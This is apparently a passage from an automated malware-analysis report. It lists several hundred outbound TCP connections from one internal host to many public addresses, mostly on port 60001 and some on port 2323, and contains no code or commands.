        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 72.103.164.178:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 40.182.127.34:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 35.248.165.235:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 150.13.1.25:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 57.119.217.0:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 68.99.76.102:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 54.231.244.126:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 105.130.162.201:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 23.10.151.63:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 54.102.132.25:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 217.223.74.240:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 119.26.172.232:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 76.8.19.26:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 182.70.68.229:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 165.95.82.184:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 98.19.65.66:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 13.109.199.98:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 99.79.178.55:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 198.56.223.131:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 49.153.182.162:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 146.19.19.135:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 4.184.156.91:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 125.2.59.41:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 190.212.48.173:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 76.0.6.92:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 191.203.42.55:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 144.128.245.105:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 169.114.50.107:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 67.33.44.116:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 37.116.77.81:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 148.221.143.15:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 92.49.60.181:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 58.47.253.78:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 218.248.49.236:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 90.214.131.124:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 123.186.164.0:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 173.3.179.96:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 4.193.182.190:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 9.214.185.128:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 181.13.44.188:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 12.227.218.51:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 140.123.87.210:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 179.151.104.98:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 51.179.16.29:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 60.56.176.50:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 177.53.179.180:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 20.84.45.177:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 103.240.192.206:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 155.191.77.101:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 164.100.18.225:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 212.43.106.175:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 70.87.99.42:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 162.6.13.232:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 83.62.154.96:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 32.161.148.115:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 109.157.103.213:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 50.157.51.33:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 137.107.0.142:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 41.178.130.167:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 136.180.125.165:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 52.229.47.236:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 103.204.116.94:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 39.174.167.62:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 158.185.49.72:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 90.38.62.92:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 4.70.196.240:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 119.144.121.239:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 50.246.243.60:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 35.27.250.95:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 165.102.237.120:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 118.224.164.209:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 82.145.81.197:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 158.117.186.183:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 223.54.66.43:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 173.196.91.115:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 167.108.56.24:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 132.2.37.169:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 54.76.171.86:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 181.119.27.154:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 107.215.152.203:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 218.39.243.167:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 91.218.156.145:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 169.106.72.166:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 75.154.22.72:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 17.186.150.92:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 37.23.55.209:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 182.54.159.173:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 157.188.146.202:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 140.126.199.86:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 114.156.97.161:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 171.22.141.109:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 94.146.116.224:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 105.101.3.40:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 198.172.211.243:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 149.250.142.186:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 187.20.10.151:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 54.218.173.38:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 190.248.226.39:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 205.119.143.149:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 122.27.230.255:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 85.13.225.242:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 136.207.254.217:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 1.140.29.55:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 14.105.184.129:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 124.234.204.62:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 125.161.193.233:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 113.114.44.150:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 39.166.230.150:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 165.141.50.205:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 121.98.44.96:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 183.91.217.243:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 169.101.254.28:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 135.93.19.149:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 24.162.139.147:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 82.17.172.45:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 137.179.194.247:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 199.117.11.125:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 165.185.194.61:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 148.77.54.158:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 88.143.80.162:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 24.126.223.106:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 77.242.200.213:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 78.196.10.204:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 128.13.184.248:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 171.218.127.191:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 194.216.18.10:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 97.40.133.27:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 114.182.29.87:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 111.67.188.235:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 67.201.194.119:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 132.206.167.162:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 169.149.149.238:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 82.220.136.223:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 4.220.193.193:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 195.238.168.31:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 161.16.208.101:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 54.145.98.151:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 174.171.174.85:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 88.109.206.94:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 205.238.176.178:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 38.105.48.105:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 206.154.151.147:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 126.111.38.39:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 111.160.78.41:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 208.8.77.133:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 159.159.243.17:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 183.142.11.246:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 156.42.162.78:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 107.158.53.184:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 39.236.109.179:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 152.36.14.122:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 99.227.152.118:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 122.238.8.209:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 203.124.158.18:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 156.204.198.37:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 147.66.174.60:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 175.175.177.60:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 90.60.149.132:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 189.170.165.16:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 141.114.246.52:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 101.53.128.241:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 180.133.27.54:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 93.81.91.14:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 204.197.95.52:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 180.37.15.234:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 124.36.207.25:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 191.76.175.71:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 166.28.239.217:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 119.177.155.178:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 77.35.38.223:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 203.64.245.173:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 49.208.13.133:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 32.1.47.24:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 65.49.211.164:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 204.57.117.80:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 161.198.185.223:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 176.217.26.186:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 34.94.4.165:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 1.57.11.162:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 168.243.204.61:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 72.173.213.204:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 188.8.125.26:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 117.111.137.251:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 144.208.84.102:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 190.239.120.26:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 114.130.215.40:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 166.56.77.128:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 39.152.104.0:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 203.165.191.153:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 183.168.233.137:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 223.161.7.6:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 114.252.52.59:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 163.194.98.72:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 19.113.99.210:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 18.19.244.36:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 140.151.47.182:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 141.155.190.93:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 81.72.15.235:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 176.63.190.64:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 204.4.242.5:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 159.94.98.86:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 128.145.62.55:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 85.132.243.39:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 61.45.12.175:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 199.199.253.100:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 25.169.94.68:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 213.157.15.243:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 156.177.150.164:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 44.109.231.93:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 103.80.146.238:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 68.24.233.252:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 25.138.235.26:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 131.130.149.154:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 38.200.213.40:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 89.163.249.195:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 61.51.115.20:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 173.124.36.7:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 201.248.167.246:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 131.11.27.230:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 82.245.182.12:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 43.239.0.245:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 216.5.123.211:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 139.47.105.252:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 165.97.106.106:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 220.94.102.135:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 184.192.57.43:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 103.26.78.126:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 153.17.190.40:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 86.189.78.147:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 148.128.147.110:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 12.208.183.15:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 121.85.105.239:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 50.3.81.115:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 195.67.19.122:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 81.254.183.17:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 24.144.22.53:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 206.181.99.110:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 71.185.42.28:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 179.41.155.0:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 41.75.109.117:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 133.188.133.195:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 206.129.231.122:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 216.98.48.225:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 88.153.80.73:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 205.144.54.102:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 37.158.229.235:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 185.209.13.180:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 126.161.7.90:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 176.104.244.75:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 198.123.38.212:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 204.249.157.202:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 54.158.115.243:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 141.16.46.184:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 132.159.36.127:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 17.205.117.14:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 122.135.180.90:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 194.110.116.124:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 162.171.25.230:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 48.110.242.5:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 209.116.57.45:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 164.194.53.156:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 165.50.187.137:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 101.40.195.149:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 32.6.162.150:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 142.251.3.147:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 166.190.111.22:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 62.134.23.191:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 152.12.96.249:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 91.228.130.147:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 111.182.31.84:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 175.141.237.185:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 147.163.138.238:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 92.26.47.6:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 32.50.237.10:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 206.36.60.1:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 210.41.65.97:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 160.254.70.191:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 77.145.165.59:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 80.162.142.63:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 196.90.55.71:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 34.240.234.120:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 81.135.252.86:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 115.54.176.189:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 135.209.90.189:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 125.110.178.11:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 147.202.175.226:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 59.251.141.207:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 64.122.159.127:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 70.0.62.16:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 222.120.242.119:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 41.5.211.108:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 45.164.218.237:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 86.127.145.27:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 107.149.28.145:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 61.70.157.161:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 150.193.154.246:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 104.74.138.220:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 36.17.177.2:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 222.82.111.220:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 163.112.196.99:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 158.74.13.171:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 134.143.156.228:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 186.34.192.143:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 210.49.92.137:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 212.95.83.190:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 62.164.59.70:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 59.255.98.188:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 142.199.230.119:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 207.58.149.186:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 144.248.174.71:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 173.204.177.145:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 106.201.100.235:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 74.50.95.55:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 90.31.236.42:60001
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 71.172.59.44:2323
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 120.25.65.201:2323
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 65.153.31.7:2323
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 64.31.7.63:2323
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 151.100.107.14:2323
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 84.203.94.223:2323
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 177.14.219.58:2323
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 151.250.232.41:2323
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 9.54.171.230:2323
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 146.105.183.4:2323
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 152.45.172.165:2323
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 90.181.198.44:2323
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 34.102.171.101:2323
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 4.198.87.247:2323
        Source: global trafficTCP traffic: 192.168.2.23:42284 -> 53.45.72.71:2323
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 160.52.234.72:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 81.225.86.245:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 203.233.73.95:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 76.62.1.217:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 157.173.223.116:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 149.231.145.199:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 206.187.76.8:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 74.155.147.251:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 222.232.111.17:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 174.207.32.38:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 131.60.77.186:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 48.133.5.124:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 12.71.158.249:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 219.150.249.221:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 138.77.187.249:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 209.142.176.24:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 76.241.222.169:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 141.233.235.246:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 42.141.159.188:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 151.86.54.221:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 64.230.96.254:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 147.139.27.42:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 42.196.74.43:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 32.103.235.0:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 166.115.162.4:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 31.145.196.90:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 145.152.32.158:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 37.9.181.237:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 141.109.67.70:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 182.234.179.0:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 130.64.134.73:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 118.160.50.194:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 185.211.243.133:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 149.146.85.161:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 204.70.68.220:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 175.226.98.113:60001
